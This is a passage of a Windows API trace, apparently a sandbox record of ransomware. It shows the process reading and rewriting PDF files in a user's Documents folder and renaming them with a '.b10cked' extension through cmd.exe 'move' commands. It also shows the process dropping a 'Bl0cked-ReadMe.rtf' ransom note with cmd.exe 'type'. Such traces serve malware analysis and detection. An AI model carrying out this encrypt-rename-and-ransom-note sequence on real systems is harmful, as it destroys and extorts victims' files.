lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x747b [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x747b [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.350] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3a3c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.350] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3a3c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.350] SetFilePointer (in: hFile=0x114, lDistanceToMove=-14908, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3a3f [0138.350] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x3a3c, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.351] SetFilePointer (in: hFile=0x114, lDistanceToMove=-14908, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x3a3f [0138.351] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x3a3c, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x3a3c, lpOverlapped=0x0) returned 1 [0138.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thcv85KW1KoWsUQP.pdf", cchWideChar=20, 
lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0138.355] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Thcv85KW1KoWsUQP.pdf", cchWideChar=20, lpMultiByteStr=0x1328834, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Thcv85KW1KoWsUQP.pdf", lpUsedDefaultChar=0x0) returned 20 [0138.355] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x747b [0138.355] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.356] CloseHandle (hObject=0x114) returned 1 [0138.356] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Thcv85KW1KoWsUQP.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF") returned 0x36 [0138.357] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0138.357] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, 
cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\THCV85~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Thcv85KW1KoWsUQP.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x638, dwThreadId=0xf70)) returned 1 [0138.512] CloseHandle (hObject=0x110) returned 1 [0138.512] CloseHandle (hObject=0x114) returned 1 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0138.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 1 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.512] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.512] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount1=51, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0138.512] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0138.513] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0138.513] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0138.513] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\") returned 0x2a [0138.513] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0138.513] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0138.513] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xdf0, dwThreadId=0xdc8)) returned 1 [0138.565] CloseHandle (hObject=0x110) returned 1 [0138.565] CloseHandle 
(hObject=0x114) returned 1 [0138.565] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\bl0cked-readme.rtf")) returned 0x20 [0138.565] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0138.565] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0138.565] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0138.565] ReleaseMutex (hMutex=0xf8) returned 1 [0138.565] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\taxjkdn0yokx7tsspc.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.565] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19535473759) returned 1 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.566] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xd76c [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0138.567] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xd284 [0138.567] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xd76c [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: 
lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xd76c [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.568] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6bb5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.568] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0138.568] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x6bb5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.569] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27573, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb7 [0138.569] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x6bb5, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.569] SetFilePointer (in: hFile=0x114, lDistanceToMove=-27573, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x6bb7 [0138.569] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, 
nNumberOfBytesToWrite=0x6bb5, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x6bb5, lpOverlapped=0x0) returned 1 [0138.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAXJKdn0yOKX7tSSpc.pdf", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0138.573] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TAXJKdn0yOKX7tSSpc.pdf", cchWideChar=22, lpMultiByteStr=0x1328834, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TAXJKdn0yOKX7tSSpc.pdf", lpUsedDefaultChar=0x0) returned 22 [0138.573] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xd76c [0138.573] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0138.573] CloseHandle (hObject=0x114) returned 1 [0138.574] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF") returned 0x34 [0138.574] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0138.574] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKD~1.PDF\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\TAXJKdn0yOKX7tSSpc.pdf.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xdd4, dwThreadId=0xf78)) returned 1 [0138.589] CloseHandle (hObject=0x110) returned 1 [0138.589] CloseHandle (hObject=0x114) returned 1 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0138.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 3 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0138.589] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0138.589] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, 